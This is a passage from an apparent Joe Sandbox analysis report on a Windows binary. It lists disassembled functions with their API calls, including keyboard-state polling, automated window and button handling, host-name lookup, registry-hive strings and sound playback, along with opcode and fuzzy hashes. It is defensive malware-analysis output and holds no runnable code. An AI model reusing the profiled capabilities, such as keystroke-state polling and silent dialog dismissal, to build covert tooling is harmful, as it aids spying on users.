                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: BuffCharUpper
                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                    • API String ID: 3964851224-909552448
                    • Opcode ID: 68b2dc38848499e12fcb210bd7b66c7bed677c21667e31016baf2c468b013d77
                    • Instruction ID: 1b565950f68a54cf8cbd76e6786e0e490ed9e2e1f5139ffbaa0f132d8b8259f5
                    • Opcode Fuzzy Hash: 68b2dc38848499e12fcb210bd7b66c7bed677c21667e31016baf2c468b013d77
                    • Instruction Fuzzy Hash: FE418B3111029ECFCF11EF94E895AFE3324BF21314F148415FEA15B291DB70AA5ADB62
                    Function 00CD5569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C77D2C: _memmove.LIBCMT ref: 00C77D66
                      • Part of subcall function 00C77A84: _memmove.LIBCMT ref: 00C77B0D
                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00CD55D2
                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00CD55E8
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CD55F9
                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00CD560B
                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00CD561C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: SendString$_memmove
                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                    • API String ID: 2279737902-1007645807
                    • Opcode ID: f54293bfe9f7620442d73574ca5854f279f6ffacd8680ce144585976a0a2a028
                    • Instruction ID: 1edb9d71e649cfef58226477d374a82390caf1ca5f68537dd02e9d8024dbe687
                    • Opcode Fuzzy Hash: f54293bfe9f7620442d73574ca5854f279f6ffacd8680ce144585976a0a2a028
                    • Instruction Fuzzy Hash: EE11D33055016D7ED720F6A6DC49DBF7B7CEFA1B10F40056AB414A21C1DE605E09C5B1
                    Function 00CD48F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                    • String ID: 0.0.0.0
                    • API String ID: 208665112-3771769585
                    • Opcode ID: b28f555b86bf93b48acb854ca274097743f4a7fe38f0747837315972f82a6f60
                    • Instruction ID: 1205d9c2679bb975df4418fef8b439d0978be54c66f92ba8c9894e569f253643
                    • Opcode Fuzzy Hash: b28f555b86bf93b48acb854ca274097743f4a7fe38f0747837315972f82a6f60
                    • Instruction Fuzzy Hash: E6112731904115ABCB24EB65DC4AFEF77BCDF01710F0501BBF65492191EF719A82D662
                    Function 00CD5217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • timeGetTime.WINMM ref: 00CD521C
                      • Part of subcall function 00C90719: timeGetTime.WINMM(?,75A8B400,00C80FF9), ref: 00C9071D
                    • Sleep.KERNEL32(0000000A), ref: 00CD5248
                    • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 00CD526C
                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00CD528E
                    • SetActiveWindow.USER32 ref: 00CD52AD
                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00CD52BB
                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00CD52DA
                    • Sleep.KERNEL32(000000FA), ref: 00CD52E5
                    • IsWindow.USER32 ref: 00CD52F1
                    • EndDialog.USER32(00000000), ref: 00CD5302
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                    • String ID: BUTTON
                    • API String ID: 1194449130-3405671355
                    • Opcode ID: 8bc3e76cae3db285c194404bf04d38cdd0c83474c94e7d18eadf51aa1aba044a
                    • Instruction ID: 33f043ce6fe4f2084b5efb7bb1ead852cce70bb7e48892f4ef16f45c3f589031
                    • Opcode Fuzzy Hash: 8bc3e76cae3db285c194404bf04d38cdd0c83474c94e7d18eadf51aa1aba044a
                    • Instruction Fuzzy Hash: 84219DB0204B04AFEB145F60EC88B3A3B69EF54387F00142AF601C23B1CBA19D05DB36
                    Function 00CD052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                    Download Yara Rule
                    APIs
                    • GetKeyboardState.USER32(?), ref: 00CD05A7
                    • SetKeyboardState.USER32(?), ref: 00CD0612
                    • GetAsyncKeyState.USER32(000000A0), ref: 00CD0632
                    • GetKeyState.USER32(000000A0), ref: 00CD0649
                    • GetAsyncKeyState.USER32(000000A1), ref: 00CD0678
                    • GetKeyState.USER32(000000A1), ref: 00CD0689
                    • GetAsyncKeyState.USER32(00000011), ref: 00CD06B5
                    • GetKeyState.USER32(00000011), ref: 00CD06C3
                    • GetAsyncKeyState.USER32(00000012), ref: 00CD06EC
                    • GetKeyState.USER32(00000012), ref: 00CD06FA
                    • GetAsyncKeyState.USER32(0000005B), ref: 00CD0723
                    • GetKeyState.USER32(0000005B), ref: 00CD0731
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: State$Async$Keyboard
                    • String ID:
                    • API String ID: 541375521-0
                    • Opcode ID: 58d29d96e4191ce2268dead88f3d73ce45a2e89606c223b04a2da536ea025f91
                    • Instruction ID: efd4bc0992f868ab00aca2fe9c20dc32823536a69266a6b177f66209c8bdde85
                    • Opcode Fuzzy Hash: 58d29d96e4191ce2268dead88f3d73ce45a2e89606c223b04a2da536ea025f91
                    • Instruction Fuzzy Hash: 7F510860A0478429FB34DBA488557EEAFB49F01380F18459F9ED25A3C2EA64DB4CCB55
                    Function 00CCC72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                    Download Yara Rule
                    APIs
                    • GetDlgItem.USER32(?,00000001), ref: 00CCC746
                    • GetWindowRect.USER32(00000000,?), ref: 00CCC758
                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00CCC7B6
                    • GetDlgItem.USER32(?,00000002), ref: 00CCC7C1
                    • GetWindowRect.USER32(00000000,?), ref: 00CCC7D3
                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00CCC827
                    • GetDlgItem.USER32(?,000003E9), ref: 00CCC835
                    • GetWindowRect.USER32(00000000,?), ref: 00CCC846
                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00CCC889
                    • GetDlgItem.USER32(?,000003EA), ref: 00CCC897
                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00CCC8B4
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00CCC8C1
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Window$ItemMoveRect$Invalidate
                    • String ID:
                    • API String ID: 3096461208-0
                    • Opcode ID: 95e1059f819093d723b072a835e84f16b07d95c0ca3de37c418a4da01ad7a020
                    • Instruction ID: fd30c390604ff4d6846f4aa11775bbfa1d86588ab737bad33b2fa19cef4027a0
                    • Opcode Fuzzy Hash: 95e1059f819093d723b072a835e84f16b07d95c0ca3de37c418a4da01ad7a020
                    • Instruction Fuzzy Hash: 29512E71B00205ABDB18CF69DD99FAEBBB6EF88710F14812DF519D6290DB70AE41CB50
                    Function 00C721A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C725DB: GetWindowLongW.USER32(?,000000EB), ref: 00C725EC
                    • GetSysColor.USER32(0000000F), ref: 00C721D3
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ColorLongWindow
                    • String ID:
                    • API String ID: 259745315-0
                    • Opcode ID: 9e3c91db7bdaa8736db1a35a64f4be8d471b30a7ac64ea461df7e58bfbc92cb5
                    • Instruction ID: 2cec05708f9135769e9a77e7866539ed0fedc3db62cfbc432ce15783adf2d8cf
                    • Opcode Fuzzy Hash: 9e3c91db7bdaa8736db1a35a64f4be8d471b30a7ac64ea461df7e58bfbc92cb5
                    • Instruction Fuzzy Hash: 86415131100140ABDB255F68DC88BBD3BA5EF06335F25C265FE798A2E6C7318E42DB61
                    Function 00CDAB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                    Download Yara Rule
                    APIs
                    • CharLowerBuffW.USER32(?,?,00CFF910), ref: 00CDAB76
                    • GetDriveTypeW.KERNEL32(00000061,00D2A620,00000061), ref: 00CDAC40
                    • _wcscpy.LIBCMT ref: 00CDAC6A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: BuffCharDriveLowerType_wcscpy
                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                    • API String ID: 2820617543-1000479233
                    • Opcode ID: ce770043e4e44212c05252c982cc271f3a157bda044289456afb9a73641d4ad4
                    • Instruction ID: c28ae314bb203eb49c299b2cdf84d0042ff4c29ddcd50cfe529a081278d4f478
                    • Opcode Fuzzy Hash: ce770043e4e44212c05252c982cc271f3a157bda044289456afb9a73641d4ad4
                    • Instruction Fuzzy Hash: 9F51AF311183019FC710EF18C881AAEB7A5FF95314F14882EF696573A2DB31DE4ADA53
                    Function 00C79997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: __i64tow__itow__swprintf
                    • String ID: %.15g$0x%p$False$True
                    • API String ID: 421087845-2263619337
                    • Opcode ID: b0087e90b939fbfeb31acd01406d94ba2688d7333eafd4c6e61d04be276c66dc
                    • Instruction ID: 0c0a804a1626a89c3a7554cb5288b05d97bebee7f307a2811523f49eeebc06c5
                    • Opcode Fuzzy Hash: b0087e90b939fbfeb31acd01406d94ba2688d7333eafd4c6e61d04be276c66dc
                    • Instruction Fuzzy Hash: 8D410671504606AFEF24EB78DC46E7B73E8EB05314F20886EE65DD7281EA319A02DB11
                    Function 00CF73C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00CF73D9
                    • CreateMenu.USER32 ref: 00CF73F4
                    • SetMenu.USER32(?,00000000), ref: 00CF7403
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CF7490
                    • IsMenu.USER32(?), ref: 00CF74A6
                    • CreatePopupMenu.USER32 ref: 00CF74B0
                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00CF74DD
                    • DrawMenuBar.USER32 ref: 00CF74E5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                    • String ID: 0$F
                    • API String ID: 176399719-3044882817
                    • Opcode ID: 355de9a73af0308929c4df82a14c168f8b3bae44a815f9faf7c4aa7fff30cd4a
                    • Instruction ID: b0682185cc3dea3805421ee2a42948478a9051462929c469d0352cc08a015236
                    • Opcode Fuzzy Hash: 355de9a73af0308929c4df82a14c168f8b3bae44a815f9faf7c4aa7fff30cd4a
                    • Instruction Fuzzy Hash: 72413675A00209EFDB21DF64D884BEABBB9FF49310F144129FA6597360D731AA10CF61
                    Function 00CF772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                    Download Yara Rule
                    APIs
                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00CF77CD
                    • CreateCompatibleDC.GDI32(00000000), ref: 00CF77D4
                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00CF77E7
                    • SelectObject.GDI32(00000000,00000000), ref: 00CF77EF
                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00CF77FA
                    • DeleteDC.GDI32(00000000), ref: 00CF7803
                    • GetWindowLongW.USER32(?,000000EC), ref: 00CF780D
                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00CF7821
                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00CF782D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                    • String ID: static
                    • API String ID: 2559357485-2160076837
                    • Opcode ID: d0b47b570dc08d1762f42e7fcb0c938df0bb96e025d3855a88a4ee3f75fd899d
                    • Instruction ID: 099ea16927361aff5570b313886740106ddba7b6f679e5d55b76eeafe0348e4f
                    • Opcode Fuzzy Hash: d0b47b570dc08d1762f42e7fcb0c938df0bb96e025d3855a88a4ee3f75fd899d
                    • Instruction Fuzzy Hash: 34316E31105219BBDF125F64DC08FEE3B69EF09360F114329FA25A61A0CB31D912DBA6
                    Function 00C97040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00C9707B
                      • Part of subcall function 00C98D68: __getptd_noexit.LIBCMT ref: 00C98D68
                    • __gmtime64_s.LIBCMT ref: 00C97114
                    • __gmtime64_s.LIBCMT ref: 00C9714A
                    • __gmtime64_s.LIBCMT ref: 00C97167
                    • __allrem.LIBCMT ref: 00C971BD
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C971D9
                    • __allrem.LIBCMT ref: 00C971F0
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C9720E
                    • __allrem.LIBCMT ref: 00C97225
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C97243
                    • __invoke_watson.LIBCMT ref: 00C972B4
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                    • String ID:
                    • API String ID: 384356119-0
                    • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                    • Instruction ID: 1cec9a4fc196948d8e42ea5a9e610f288e2f908bf28eea907d38971fd67cf01b
                    • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                    • Instruction Fuzzy Hash: 47710671A15B07EBDF149F79CC49B6AB3B8AF11324F14432AF424E7281E770EA409790
                    Function 00CD2A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00CD2A31
                    • GetMenuItemInfoW.USER32(00D36890,000000FF,00000000,00000030), ref: 00CD2A92
                    • SetMenuItemInfoW.USER32(00D36890,00000004,00000000,00000030), ref: 00CD2AC8
                    • Sleep.KERNEL32(000001F4), ref: 00CD2ADA
                    • GetMenuItemCount.USER32(?), ref: 00CD2B1E
                    • GetMenuItemID.USER32(?,00000000), ref: 00CD2B3A
                    • GetMenuItemID.USER32(?,-00000001), ref: 00CD2B64
                    • GetMenuItemID.USER32(?,?), ref: 00CD2BA9
                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00CD2BEF
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CD2C03
                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CD2C24
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                    • String ID:
                    • API String ID: 4176008265-0
                    • Opcode ID: 42da76fa8bc6b59865563d7cdb21ef6208c6b5399efd5f08d288d63d8dbad10e
                    • Instruction ID: d9f24e93db2e156b4fa13923b0434f09cdd86d2eecf660126a7fd8fcb5301ee6
                    • Opcode Fuzzy Hash: 42da76fa8bc6b59865563d7cdb21ef6208c6b5399efd5f08d288d63d8dbad10e
                    • Instruction Fuzzy Hash: 436181B0900249AFDB21CF64C888EBE7BB8EF51304F14455BEA5297351D771AE46DB21
                    Function 00CF7192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00CF7214
                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00CF7217
                    • GetWindowLongW.USER32(?,000000F0), ref: 00CF723B
                    • _memset.LIBCMT ref: 00CF724C
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00CF725E
                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00CF72D6
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: MessageSend$LongWindow_memset
                    • String ID:
                    • API String ID: 830647256-0
                    • Opcode ID: 317bcb5ba56722bd90a529e9c758058239bfc400cf34a2c7a1c2e261c27432d2
                    • Instruction ID: 0fb1212eeaae0384c94ef2e3b4b71b34ea71ea91499f0799603f8b7d2c3e0590
                    • Opcode Fuzzy Hash: 317bcb5ba56722bd90a529e9c758058239bfc400cf34a2c7a1c2e261c27432d2
                    • Instruction Fuzzy Hash: 02615975900208AFDB20DFA8CC81EFE77B8AB09710F144259FA15E72A1D774AA46DB61
                    Function 00CC710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                    Download Yara Rule
                    APIs
                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00CC7135
                    • SafeArrayAllocData.OLEAUT32(?), ref: 00CC718E
                    • VariantInit.OLEAUT32(?), ref: 00CC71A0
                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00CC71C0
                    • VariantCopy.OLEAUT32(?,?), ref: 00CC7213
                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00CC7227
